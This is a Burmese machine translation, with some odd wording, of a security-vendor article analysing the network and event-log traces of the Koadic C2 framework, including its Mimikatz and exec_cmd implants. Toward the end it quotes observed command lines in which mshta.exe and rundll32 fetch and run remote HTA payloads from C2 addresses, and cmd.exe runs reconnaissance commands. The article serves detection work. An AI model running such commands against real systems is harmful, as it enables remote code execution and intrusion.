တုံ့ပြန်မှုပြောင်းလဲနိုင်သော WS ကိုအခြေခံ၍ လုပ်ဆောင်ချက်သည် WScript.Shell မှတဆင့်ဖြစ်ပေါ်ကြောင်း ရှင်းရှင်းလင်းလင်းဖြစ်လာပြီး STAGER၊ SESSIONKEY၊ JOBKEY၊ JOBKEYPATH၊ EXPIRE တွင် လက်ရှိစက်ရှင်၏ ကန့်သတ်ဘောင်များဆိုင်ရာ အဓိကအချက်အလက်များ ပါဝင်ပါသည်။ ၎င်းသည် CnC ဆာဗာနှင့် HTTP ချိတ်ဆက်မှုတွင် ပထမဆုံး တောင်းဆိုချက်-တုံ့ပြန်မှုအတွဲဖြစ်သည်။ နောက်ဆက်တွဲတောင်းဆိုချက်များသည် မော်ဂျူးများ (implants) ဟုခေါ်သော လုပ်ဆောင်နိုင်စွမ်းနှင့် တိုက်ရိုက်သက်ဆိုင်ပါသည်။ Koadic modules များအားလုံးသည် CnC နှင့် တက်ကြွသော session တစ်ခုဖြင့်သာ အလုပ်လုပ်ပါသည်။

မီမီကတ်ဇ်

CME သည် Bloodhound နှင့်အလုပ်လုပ်သကဲ့သို့ Koadic သည် သီးခြားပရိုဂရမ်တစ်ခုအနေဖြင့် Mimikatz နှင့်အလုပ်လုပ်ပြီး ၎င်းကိုစတင်ရန် နည်းလမ်းများစွာရှိသည်။ အောက်တွင် Mimikatz implant ကိုဒေါင်းလုဒ်လုပ်ရန်အတွက် တောင်းဆိုချက်-တုံ့ပြန်မှုအတွဲတစ်ခုဖြစ်သည်။

ထမင်း။ 12. Mimikatz ကို Koadic သို့ လွှဲပြောင်းပါ။

တောင်းဆိုချက်ရှိ URI ဖော်မတ်သည် ပြောင်းလဲသွားသည်ကို သင်မြင်နိုင်သည်။ ယခု ၎င်းတွင် ရွေးချယ်ထားသော module အတွက် တာဝန်ရှိသည့် csrf variable အတွက် တန်ဖိုးတစ်ခုပါရှိသည်။ သူမ၏အမည်ကို ဂရုမစိုက်ပါနှင့်။ CSRF ကို အများအားဖြင့် ကွဲပြားစွာ နားလည်ကြသည်ကို ကျွန်ုပ်တို့အားလုံး သိပါသည်။ တုံ့ပြန်မှုသည် Koadic ၏ ပင်မကိုယ်ထည်ဖြစ်ပြီး၊ Mimikatz နှင့်ဆက်စပ်သောကုဒ်ကို ထည့်သွင်းထားသည်။ ၎င်းသည် အလွန်ကြီးမားသောကြောင့် အဓိကအချက်များကို ကြည့်ကြပါစို့။ ဤနေရာတွင် ကျွန်ုပ်တို့တွင် Mimikatz စာကြည့်တိုက်ကို ထည့်သွင်းမည့် base64 တွင် ကုဒ်နံပါတ်တပ်ထားသော .NET အတန်းအစားနှင့် Mimikatz ကို စတင်ရန် အကြောင်းပြချက်များရှိသည်။ လုပ်ဆောင်မှုရလဒ်ကို ရှင်းလင်းသောစာသားဖြင့် ကွန်ရက်ပေါ်တွင် ထုတ်လွှင့်သည်။

ထမင်း။ 13. အဝေးထိန်းစက်ပေါ်တွင် Mimikatz ကိုအသုံးပြုခြင်း၏ရလဒ်

Exec_cmd

Koadic တွင် အဝေးမှ အမိန့်ပေးချက်များကို လုပ်ဆောင်နိုင်သော module များလည်း ရှိပါသည်။ ဤနေရာတွင် တူညီသော URI မျိုးဆက်နည်းလမ်းနှင့် ရင်းနှီးသော sid နှင့် csrf variables များကို တွေ့ရမည်ဖြစ်ပါသည်။ exec_cmd module ၏အခြေအနေတွင်၊ shell command များကိုလုပ်ဆောင်နိုင်သောကိုယ်ထည်ထဲသို့ code ပေါင်းထည့်သည်။ အောက်တွင် CnC ဆာဗာ၏ HTTP တုံ့ပြန်မှုတွင်ပါရှိသော ထိုကုဒ်ကို ပြထားသည်။

ထမင်း။ 14. Implant ကုဒ် exec_cmd

ကုဒ်လုပ်ဆောင်မှုအတွက် ရင်းနှီးသော WS ရည်ညွှန်းချက်ပါသော GAWTUUGCFI ကိန်းရှင်သည် လိုအပ်ပါသည်။ ၎င်း၏အကူအညီဖြင့်၊ implant သည် shell ကိုခေါ်ဆိုပြီး output data stream နှင့် shell.run တို့ကိုပြန်ခြင်းမရှိဘဲ code ၏အကိုင်းအခက်နှစ်ခု - shell.exec ကိုလုပ်ဆောင်သည်။

Koadic သည် ပုံမှန်ကိရိယာတစ်ခုမဟုတ်သော်လည်း ၎င်းတွင်တရားဝင်အသွားအလာတွင်တွေ့ရှိနိုင်သည့် ၎င်း၏ကိုယ်ပိုင်လက်ရာများရှိသည်။

• HTTP တောင်းဆိုမှုများ၏ အထူးဖွဲ့စည်းမှု၊
• winHttpRequests API ကိုသုံးပြီး၊
• ActiveXObject မှတဆင့် WScript.Shell အရာဝတ္ထုကို ဖန်တီးခြင်း၊
• ကြီးမားသောအကောင်ထည်ဖော်နိုင်သောကိုယ်ထည်။

ကနဦးချိတ်ဆက်မှုကို Stager မှ အစပြုထားသောကြောင့် Windows ဖြစ်ရပ်များမှတစ်ဆင့် ၎င်း၏လုပ်ဆောင်ချက်ကို သိရှိနိုင်သည်။ mshta အတွက်၊ ဤသည်မှာ event 4688 ဖြစ်ပြီး၊ start attribute ဖြင့် process တစ်ခုဖန်တီးခြင်းကို ညွှန်ပြသည်-

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic လည်ပတ်နေချိန်တွင်၊ ၎င်းကို ပြီးပြည့်စုံသော သွင်ပြင်လက္ခဏာများဖြင့် အခြား 4688 ဖြစ်ရပ်များကို သင်တွေ့မြင်နိုင်သည်-

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

တွေ့ရှိချက်များ

ရာဇ၀တ်ကောင်များကြားတွင် ကိုယ်ထူကိုယ်ထလမ်းကြောင်းသည် ရေပန်းစားလာသည်။ ၎င်းတို့သည် ၎င်းတို့၏လိုအပ်ချက်များအတွက် Windows တွင် တည်ဆောက်ထားသော ကိရိယာများနှင့် ယန္တရားများကို အသုံးပြုကြသည်။ ဤမူအရ APT အစီရင်ခံစာများတွင် ပိုမိုထင်ရှားလာပြီးနောက် နာမည်ကြီးကိရိယာ Koadic၊ CrackMapExec နှင့် Impacket တို့ကို ကျွန်ုပ်တို့ တွေ့မြင်နေရသည်။ ဤကိရိယာများအတွက် GitHub ရှိ ခက်ရင်းအရေအတွက်လည်း တိုးလာနေပြီး အသစ်များ ပေါ်လာသည် (ယခု ၎င်းတို့အနက်မှ တစ်ထောင်ခန့်ရှိနေပြီ)။ လမ်းကြောင်းသည် ၎င်း၏ရိုးရှင်းမှုကြောင့် လူကြိုက်များလာသည်- တိုက်ခိုက်သူများသည် ပြင်ပကိရိယာများ မလိုအပ်ပါ၊ ၎င်းတို့သည် သားကောင်များ၏ စက်များတွင် ရှိနှင့်ပြီးဖြစ်ကာ လုံခြုံရေးအစီအမံများကို ကျော်လွှားနိုင်ရန် ကူညီပေးပါသည်။ ကျွန်ုပ်တို့သည် ကွန်ရက်ဆက်သွယ်ရေးကို လေ့လာရန် အာရုံစိုက်သည်- အထက်တွင်ဖော်ပြထားသော ကိရိယာတစ်ခုစီသည် ကွန်ရက်အသွားအလာတွင် ၎င်း၏ကိုယ်ပိုင်ခြေရာများကို ချန်ထားခဲ့သည်၊ ၎င်းတို့ကို အသေးစိတ်လေ့လာခြင်းဖြင့် ကျွန်ုပ်တို့၏ထုတ်ကုန်ကို သင်ကြားနိုင်စေပါသည်။ PT Network Attack Discovery ၎င်းတို့နှင့် ပတ်သက်သည့် ဆိုက်ဘာဖြစ်ရပ်များ၏ ကွင်းဆက်တစ်ခုလုံးကို နောက်ဆုံးတွင် စုံစမ်းစစ်ဆေးရန် ကူညီပေးသည့် ၎င်းတို့ကို ရှာဖွေတွေ့ရှိသည်။

စာရေးဆရာများ:

• Anton Tyurin၊ ကျွမ်းကျင်ဝန်ဆောင်မှုဌာန၏အကြီးအကဲ၊ PT Expert လုံခြုံရေးစင်တာ၊ အပြုသဘောဆောင်သောနည်းပညာများ
• Egor Podmokov၊ ကျွမ်းကျင်သူ၊ PT Expert Security Center၊ Positive Technologies

source: www.habr.com